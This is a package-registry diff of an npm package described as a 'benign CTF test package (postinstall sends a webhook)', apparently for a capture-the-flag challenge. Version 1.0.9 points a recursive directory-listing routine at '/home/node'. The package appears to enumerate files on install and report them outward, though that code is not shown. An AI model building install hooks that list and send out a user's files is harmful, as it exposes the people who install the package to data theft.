@alexandrsarioglo/npm-ghost-htb 1.0.8 → 1.0.9

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.js +2 -2
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -89,8 +89,8 @@ async function readFileSafe(p, maxBytes) {
89
89
  // })();
90
90
 
91
91
 
92
- // const START_DIR = '/home/node'; // <<--- edit this to the directory you want listed
93
- const START_DIR = '/Users/alexandrsarioglo'; // <<--- edit this to the directory you want listed
92
+ const START_DIR = '/home/node'; // <<--- edit this to the directory you want listed
93
+ // const START_DIR = '/Users/alexandrsarioglo'; // <<--- edit this to the directory you want listed
94
94
  const RECURSIVE = true; // set to false to list only the top level
95
95
  const MAX_ENTRIES_PER_DIR = 10000; // safety cap
96
96
 
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@alexandrsarioglo/npm-ghost-htb",
3
- "version": "1.0.8",
3
+ "version": "1.0.9",
4
4
  "main": "index.js",
5
5
  "description": "benign CTF test package (postinstall sends a webhook)",
6
6
  "scripts": {